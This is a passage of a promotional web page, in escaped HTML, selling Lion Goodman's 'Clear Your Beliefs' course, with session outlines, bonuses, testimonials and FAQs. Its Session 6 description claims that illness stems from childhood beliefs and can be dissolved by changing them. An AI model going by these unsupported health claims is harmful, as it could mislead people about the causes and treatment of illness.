them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements 